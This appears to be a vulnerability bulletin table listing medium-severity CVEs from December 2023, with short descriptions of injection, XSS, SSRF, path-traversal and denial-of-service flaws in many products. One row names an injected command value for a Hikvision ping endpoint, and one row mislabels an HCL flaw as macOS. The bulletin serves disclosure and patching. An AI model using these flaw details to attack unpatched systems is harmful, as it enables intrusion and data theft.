apache -- streampark | In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. | 2023-12-15 | 4.9 | CVE-2023-30867 security@apache.org |
apache -- superset | Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1. | 2023-12-19 | 6.5 | CVE-2023-46104 security@apache.org security@apache.org |
apache -- superset | A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue. | 2023-12-19 | 6.5 | CVE-2023-49736 security@apache.org security@apache.org |
apple -- macos | HCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. | 2023-12-21 | 5.3 | CVE-2023-45703 psirt@hcl.com |
automad -- automad | A vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7037 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
automad -- automad | A vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 4.7 | CVE-2023-7036 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
automad -- automad | A vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 4.3 | CVE-2023-7038 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
aveva -- edge | An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses. | 2023-12-16 | 5.3 | CVE-2021-42794 cve@mitre.org cve@mitre.org cve@mitre.org |
aws -- aws-sdk-php | AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1. | 2023-12-22 | 6 | CVE-2023-51651 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
bazarr -- bazarr | Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols. | 2023-12-15 | 5.3 | CVE-2023-50266 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
beijing_baichuo -- s210 | A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688. | 2023-12-21 | 6.3 | CVE-2023-7039 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
bosch -- building_integration_system_video_engine | An improper handling of a malformed API answer packets to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability an attacker has to replace an existing API server e.g. through Man-in-the-Middle attacks. | 2023-12-18 | 5.9 | CVE-2023-35867 psirt@bosch.com |
bosch -- cpp14_firmware | An information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet. | 2023-12-18 | 5.3 | CVE-2022-41677 psirt@bosch.com |
cacti -- cacti | Cacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability - execution of arbitrary javascript code in the attacked user's browser. This issue has been patched in version 1.2.26. | 2023-12-22 | 6.1 | CVE-2023-49086 security-advisories@github.com |
cacti -- cacti | Cacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti. | 2023-12-22 | 6.1 | CVE-2023-49088 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
cacti -- cacti | Cacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php.` When uploading an xml template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains unfiltered xml template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available. | 2023-12-22 | 5.4 | CVE-2023-50250 security-advisories@github.com security-advisories@github.com |
clear -- clearml_server | Cross-site Scripting (XSS) - Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (I.e when a malicious party already has access to the internal network and to a user's ClearML login credentials). | 2023-12-18 | 5.4 | CVE-2023-6778 security@huntr.dev security@huntr.dev |
clickhouse -- clickhouse | ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited. | 2023-12-21 | 5.9 | CVE-2023-48298 security-advisories@github.com security-advisories@github.com |
codelyfe -- stupid_simple_cms | A vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability. | 2023-12-21 | 5.4 | CVE-2023-7041 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
codelyfe -- stupid_simple_cms | A vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability. | 2023-12-21 | 4.3 | CVE-2023-7040 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
corveda -- phpsandbox | A vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability. | 2023-12-19 | 4.3 | CVE-2014-125107 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
csharp -- cws_collaborative_development_platform | SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information. | 2023-12-15 | 6.5 | CVE-2023-48374 twcert@cert.org.tw |
dell -- cpg_bios | Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system. | 2023-12-22 | 6.7 | CVE-2023-39251 security_alert@emc.com |
dell -- emc_networker | Dell NetWorker Virtual Edition versions 19.8 and below contains the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure. | 2023-12-18 | 5.3 | CVE-2023-28053 security_alert@emc.com |
dfir-iris -- iris-web | Iris is a web collaborative platform aiming to help incident responders sharing technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available. | 2023-12-22 | 4.6 | CVE-2023-50712 security-advisories@github.com security-advisories@github.com |
dfirkuiper -- kuiper | A vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability. | 2023-12-18 | 5.9 | CVE-2023-6908 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
efacec -- uc_500e | An attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application. | 2023-12-20 | 6.3 | CVE-2023-50703 ics-cert@hq.dhs.gov |
efacec -- uc_500e | An attacker could create malicious requests to obtain sensitive information about the web server. | 2023-12-20 | 5.3 | CVE-2023-50705 ics-cert@hq.dhs.gov |
efacec -- uc_500e | An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users. | 2023-12-20 | 4.3 | CVE-2023-50704 ics-cert@hq.dhs.gov |
efacec -- uc_500e | A user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens. | 2023-12-20 | 4.1 | CVE-2023-50706 ics-cert@hq.dhs.gov |
enterprise_server -- enterprise_server | Improper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the "Get a check run" API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7 3.10.4, and 3.11.0. | 2023-12-21 | 5.3 | CVE-2023-46646 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
enterprise_server -- enterprise_server | An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 4.9 | CVE-2023-51379 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
enterprise_server -- enterprise_server | Improper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 6.5 | CVE-2023-6804 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
enterprise_server -- enterprise_server | A race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 5.8 | CVE-2023-6803 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
ethex -- contracts | A vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271. | 2023-12-19 | 4.3 | CVE-2019-25157 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
gallagher -- command_centre | Client-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior. | 2023-12-18 | 5.4 | CVE-2023-23570 disclosures@gallagher.com |
gallagher -- command_centre_diagnostics_service | A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)). | 2023-12-18 | 5.5 | CVE-2023-46686 disclosures@gallagher.com |
gallagher -- command_centre_server | Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior. | 2023-12-18 | 4.3 | CVE-2023-23576 disclosures@gallagher.com |
gallagher -- command_centre_server | An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all version of 8.50 and prior. | 2023-12-18 | 4.3 | CVE-2023-23584 disclosures@gallagher.com |
gallagher -- controller_7000 | Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)). | 2023-12-18 | 6.8 | CVE-2023-6355 disclosures@gallagher.com |
getsentry -- symbolicator | Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator's API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`. | 2023-12-22 | 4.3 | CVE-2023-51451 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
github -- enterprise_server | A path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 6.8 | CVE-2023-46645 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
github -- enterprise_server | A race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 6.3 | CVE-2023-46649 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
gitlab -- gitlab | An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag. | 2023-12-15 | 6.5 | CVE-2023-6051 cve@gitlab.com cve@gitlab.com |
gitlab -- gitlab | An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI. | 2023-12-15 | 5.7 | CVE-2023-5512 cve@gitlab.com cve@gitlab.com |
gitlab -- gitlab | An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API. | 2023-12-15 | 4.3 | CVE-2023-5061 cve@gitlab.com cve@gitlab.com |
gradio -- gradio | Gradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0. | 2023-12-22 | 5.6 | CVE-2023-51449 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
grails -- grails | Grails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0. | 2023-12-21 | 6.5 | CVE-2023-46131 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
hcl_software -- hcl_bigfix_mobile/modern_client_management | Due to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage. | 2023-12-21 | 6.6 | CVE-2023-28025 psirt@hcl.com |
hcl_software -- hcl_launch | HCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. | 2023-12-21 | 4.3 | CVE-2023-45700 psirt@hcl.com |
hcltech -- connections | HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data. | 2023-12-15 | 6.5 | CVE-2023-28022 psirt@hcl.com |
hikvision -- intercom_broadcast_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability. | 2023-12-17 | 6.5 | CVE-2023-6894 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
hikvision -- intercom_broadcasting_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. | 2023-12-17 | 6.3 | CVE-2023-6895 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
hitachi_energy -- rtu500_series_cmu | Vulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in buffer overflow and as final consequence to a reboot of an RTU500 CMU. | 2023-12-19 | 5.9 | CVE-2023-6711 cybersecurity@hitachienergy.com |
home_assistant -- home_assistant | Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it. | 2023-12-15 | 4.3 | CVE-2023-50715 security-advisories@github.com security-advisories@github.com |
ibm -- aix | IBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963. | 2023-12-22 | 6.2 | CVE-2023-45165 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- aix | IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970. | 2023-12-19 | 6.2 | CVE-2023-45172 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- cloud_pak_for_business_automation | IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805. | 2023-12-18 | 4.9 | CVE-2023-40691 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- db2_mirror_for_i | IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim's PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532. | 2023-12-18 | 5.3 | CVE-2023-47741 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- informix_jdbc | IBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116. | 2023-12-20 | 6.3 | CVE-2023-35895 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- qradar_siem | IBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372. | 2023-12-19 | 4.9 | CVE-2023-47146 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197. | 2023-12-20 | 5.3 | CVE-2023-47703 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522. | 2023-12-20 | 5.4 | CVE-2023-47707 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228. | 2023-12-20 | 4.3 | CVE-2023-47705 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- urbancode_deploy | An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509. | 2023-12-20 | 6.2 | CVE-2023-42012 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- urbancode_deploy | IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510. | 2023-12-20 | 5.3 | CVE-2023-42013 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- urbancode_deploy | IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799. | 2023-12-20 | 5.3 | CVE-2023-47161 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- urbancode_deploy | IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512. | 2023-12-19 | 4.3 | CVE-2023-42015 psirt@us.ibm.com psirt@us.ibm.com |
idemia -- multiple_products | When handling contactless cards, usage of a specific function to get additional information from the card which doesn't check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device | 2023-12-15 | 6.8 | CVE-2023-33222 a87f365f-9d39-4848-9b3a-58c7cae69cab |
infinispan -- infinispan | A flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. | 2023-12-18 | 6.5 | CVE-2023-3628 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
infinispan -- infinispan | A flaw was found in Infinispan's REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. | 2023-12-18 | 4.3 | CVE-2023-3629 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
infinispan -- infinispan-server | A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service. | 2023-12-18 | 4.4 | CVE-2023-5236 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
instipod -- duouniversalkeycloakauthenticator | An information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. An user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability. | 2023-12-23 | 4.5 | CVE-2023-49594 talos-cna@cisco.com talos-cna@cisco.com |
insyde -- insydeh2o | TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process. | 2023-12-16 | 4.7 | CVE-2022-24351 cve@mitre.org cve@mitre.org |
iscute -- cute_http_file_server | Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page. | 2023-12-20 | 5.4 | CVE-2023-50639 cve@mitre.org |
i̇stanbul_soft_informatics_and_consultancy_limited_company -- softomi_geli?mi?_c2c_pazaryeri_yaz?l?m? | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ?stanbul Soft Informatics and Consultancy Limited Company Softomi Geli?mi? C2C Pazaryeri Yaz?l?m? allows Reflected XSS. This issue affects Softomi Geli?mi? C2C Pazaryeri Yaz?l?m?: before 12122023. | 2023-12-21 | 6.1 | CVE-2023-6122 iletisim@usom.gov.tr |
jetbrains -- intellij_idea | In JetBrains IntelliJ IDEA before 2023.3.2 code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration | 2023-12-21 | 6.3 | CVE-2023-51655 cve@jetbrains.com |
jetbrains -- youtrack | In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed | 2023-12-15 | 4.3 | CVE-2023-50871 cve@jetbrains.com |
kaifa -- webitr_attendance_system | Kaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database. | 2023-12-15 | 6.5 | CVE-2023-48395 twcert@cert.org.tw |
kaifa -- webitr_attendance_system | Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message. | 2023-12-15 | 4.3 | CVE-2023-48393 twcert@cert.org.tw |
